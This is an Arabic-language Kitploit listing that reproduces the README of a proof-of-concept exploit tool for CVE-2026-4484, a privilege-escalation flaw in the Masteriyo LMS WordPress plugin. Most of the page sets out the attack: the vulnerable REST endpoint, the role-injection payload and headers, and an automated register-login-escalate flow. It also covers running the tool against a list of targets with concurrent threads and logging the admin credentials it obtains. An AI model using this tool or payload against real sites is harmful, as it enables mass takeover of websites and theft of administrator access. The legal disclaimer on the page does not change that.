Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/nxploited/cve-2026-4484
المصادقة والترخيصتصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubnxploited/cve-2026-4484

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - غياب التحقق من الصلاحيات يسمح بتصعيد الامتيازات من مستخدم موثّق (طالب+) إلى مسؤول

عرض المستودع
5منذ 4 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-4484

Masteriyo LMS <= 2.1.6 - غياب التحقق من التفويض يؤدي إلى تصعيد صلاحيات المستخدم المصادق (طالب+) إلى مسؤول

Typing SVG


🔴 نظرة عامة على الثغرة

CVE-2026-4484 — تصعيد صلاحيات بعد المصادقة (طالب ← مسؤول)

الوصف:
إضافة Masteriyo LMS لووردبريس معرّضة لثغرة تصعيد الصلاحيات في جميع الإصدارات حتى 2.1.6 وما قبلها. ينبع أصل الثغرة من دالة InstructorsController::prepare_object_for_database، التي تفشل في تقييد تعيين الأدوار بشكل صحيح أثناء طلبات REST API. يمكن لمهاجم مصادق لا يملك سوى وصول بمستوى طالب صياغة طلب POST مخصص إلى نقطة نهاية Masteriyo REST API — بحقن "roles": ["administrator"] في حمولة الطلب — لرفع صلاحيات حسابه بصمت إلى مسؤول في ووردبريس، محققًا سيطرة كاملة على الموقع دون أي تدخل إداري.


🛠️ وصف الأداة

هذا نص برمجي لإثبات المفهوم (PoC) لاستغلال الثغرة يستهدف تثبيتات ووردبريس التي تشغّل إصدارًا معرضًا للثغرة من إضافة Masteriyo LMS. تدعم الأداة وضعين للهجوم:

الوضعالاسمالتدفقحالة الاستخدام
1

تدفق الهجوم

root@kitploit:~
[Register / Login as Student]
         ↓
[Fetch Dashboard Context — user_id + nonce]
         ↓
[POST /wp-json/masteriyo/v1/users/instructors/{id}]
[Payload: {"roles": ["administrator"]}]
         ↓
[Re-login with fresh session]
         ↓
[Verify /wp-admin access → confirmed Administrator]
         ↓
[Write to Login_admin.txt]

📋 المتطلبات

متطلبات النظام

  • بايثون 3.8 أو أحدث
  • Linux / Windows / macOS

تبعيات بايثون

root@kitploit:~
pip install requests urllib3 colorama

أو عبر ملف المتطلبات:

root@kitploit:~
pip install -r requirements.txt

requirements.txt:

root@kitploit:~
requests>=2.28.0
urllib3>=1.26.0
colorama>=0.4.6

🚀 التثبيت

root@kitploit:~
# Clone the repository
git clone https://github.com/Nxploited/CVE-2026-4484.git
cd CVE-2026-4484

# Install dependencies
pip install -r requirements.txt

# Run the tool
python3 CVE-2026-4484.py

⚙️ الاستخدام

تشغيل أساسي

root@kitploit:~
python3 CVE-2026-4484.py

تستخدم الأداة واجهة طرفية تفاعلية — تُطلب جميع المعاملات في وقت التشغيل.


🗂️ تنسيق قائمة الأهداف

أنشئ ملفًا نصيًا بسيطًا (مثل list.txt) وضع هدفًا واحدًا في كل سطر:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

🟥 الوضع 1 — Nx_1 (تسجيل + تسجيل دخول + تصعيد)

استخدم هذا الوضع عندما لا تملك حسابًا مسبقًا على الهدف. تقوم الأداة تلقائيًا بتسجيل حساب طالب جديد ثم تصعّد صلاحياته.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 1
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username to register (Nx_1) [Nxploited]: Nxploited
Email to use for registration+login (Nx_1) [[email protected]]: [email protected]
Password to use (Nx_1) [Nx_admin]: Nx_admin123!

الخطوات المنفذة تلقائيًا:

  1. GET /account/signup/ ← استخراج nonce التسجيل
  2. POST /st/ ← تسجيل حساب جديد كطالب
  3. GET /account/ ← استخراج nonce تسجيل الدخول
  4. POST /wp-admin/admin-ajax.php ← تسجيل الدخول عبر Masteriyo AJAX
  5. GET /account/#/dashboard ← استخراج current_user_id + nonce
  6. POST /wp-json/masteriyo/v1/users/instructors/{id} مع {"roles":["administrator"]}
  7. إعادة تسجيل الدخول بجلسة جديدة ← التحقق من الوصول إلى لوحة المسؤول
  8. كتابة النتائج المؤكدة في Login_admin.txt

🟩 الوضع 2 — Nx_2 (تسجيل دخول + تصعيد — حساب قائم)

استخدم هذا الوضع عندما تملك بالفعل حساب طالب أو مدرّب صالحًا على الهدف.

root@kitploit:~
Select mode (1=Nx_1, 2=Nx_2) [2]: 2
Targets list file (one host/URL per line) [list.txt]: list.txt
Threads (concurrent sites) [5]: 5
HTTP timeout (seconds) [10]: 10
Username or Email for login+escalation (Nx_2) [admin]: [email protected]
Password for that user: mypassword

الخطوات المنفذة تلقائيًا:

  1. GET /account/ ← استخراج nonce تسجيل الدخول
  2. POST /wp-admin/admin-ajax.php ← تسجيل الدخول عبر Masteriyo AJAX
  3. GET /account/#/dashboard ← استخراج current_user_id + nonce
  4. POST /wp-json/masteriyo/v1/users/instructors/{id} مع {"roles":["administrator"]}
  5. إعادة تسجيل الدخول بجلسة جديدة ← التحقق من الوصول إلى لوحة المسؤول
  6. كتابة النتائج المؤكدة في Login_admin.txt

📁 ملفات الإخراج

الملفالوصف
Login_admin.txtجميع حالات تصعيد صلاحيات المسؤول المؤكدة

تنسيق الإخراج

root@kitploit:~
https://target.com/wp-login.php user:[email protected]|pass:Nx_admin123!

نموذج لإخراج الطرفية

root@kitploit:~
[OK]    https://target.com :: LOGIN OK :: success
[OK]    https://target.com :: DASHBOARD :: user_id=42 nonce=a1b2c3d4e5
[OK]    https://target.com :: ESCALATE SUCCESS :: user_id=42 username=nxploited roles=['administrator']
[OK]    https://target.com :: ADMIN SESSION VERIFIED (dashboard + plugin-install access).

🔍 التفاصيل التقنية

نقطة النهاية المعرضة للثغرة

root@kitploit:~
POST /wp-json/masteriyo/v1/users/instructors/{user_id}

حمولة الاستغلال

root@kitploit:~
{
  "roles": ["administrator"]
}

الترويسات المطلوبة

root@kitploit:~
Content-Type: application/json
X-WP-Nonce: <extracted_from_dashboard>

السبب الجذري

تعالج دالة InstructorsController::prepare_object_for_database في Masteriyo LMS معامل roles القادم من نص طلب REST دون التحقق مما إذا كان المستخدم المُرسِل يملك صلاحية edit_users أو promote_users. يمكن لأي مستخدم مصادق (بمستوى طالب أو أعلى) يتمكن من الوصول إلى نقطة النهاية هذه إرسال قيمة دور تعسفية — بما في ذلك administrator — والتي تُحفظ مباشرةً في جدول بيانات المستخدمين الوصفية في ووردبريس.


📡 التواصل والمؤلف

بواسطة: Nxploited (Khaled Alenazi)

 


⚠️ إخلاء المسؤولية القانوني

تُقدَّم هذه الأداة لأغراض التعليم والبحث الأمني المصرح به فقط.

المؤلف، Nxploited (Khaled Alenazi)، وجميع المساهمين في هذا المشروع لا يقرّون، ولا يدعمون، ولا يتحملون أي مسؤولية عن إساءة استخدام هذه الأداة أو أي ضرر ناتج عن استخدام هذا البرنامج ضد أنظمة لا تملك إذنًا كتابيًا صريحًا لاختبارها.

  • ✅ مسموح: الاستخدام على الأنظمة التي تملكها أو التي حصلت على إذن كتابي صريح لاختبارها.
  • ❌ محظور: الاستخدام ضد أي أنظمة دون إذن كتابي صريح مسبق من مالك النظام.

الوصول غير المصرح به إلى أنظمة الحاسوب غير قانوني ويعاقب عليه بموجب القوانين المعمول بها بما في ذلك على سبيل المثال لا الحصر قانون الاحتيال وإساءة استخدام الحاسوب (CFAA)، وقانون إساءة استخدام الحاسوب (CMA)، وما يعادلهما من تشريعات حول العالم.

باستخدامك لهذه الأداة، فإنك تتحمل المسؤولية الكاملة عن أفعالك وتؤكد أن لديك السلطة القانونية لاختبار الأنظمة المستهدفة.

لا يتحمل المؤلف أي مسؤولية مهما كانت عن أي أضرار مباشرة أو غير مباشرة أو عرضية أو تبعية ناتجة عن استخدام أو إساءة استخدام هذا البرنامج.


© 2026 Nxploited (Khaled Alenazi) — لأغراض البحث الأمني المصرح به فقط.

تنزيل الأداة
الحقلالتفاصيل
معرف CVECVE-2026-4484
الخطورةعالية — درجة CVSS v3.1: 8.8
المتجهCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CNAWordfence
البرنامج المتأثرإضافة Masteriyo LMS لووردبريس
الإصدارات المتأثرةجميع الإصدارات حتى 2.1.6 وما قبلها
نوع الثغرةتصعيد الصلاحيات (التلاعب بالأدوار)
يتطلب مصادقةنعم — مستوى طالب أو أعلى
CWECWE-269: إدارة صلاحيات غير سليمة
Nx_1
تسجيل ← تسجيل دخول ← تصعيد ← التحقق من المسؤول
هجوم جديد — لا يتطلب حسابًا مسبقًا
2Nx_2تسجيل دخول ← تصعيد ← التحقق من المسؤولحساب قائم متاح (طالب/مدرّب)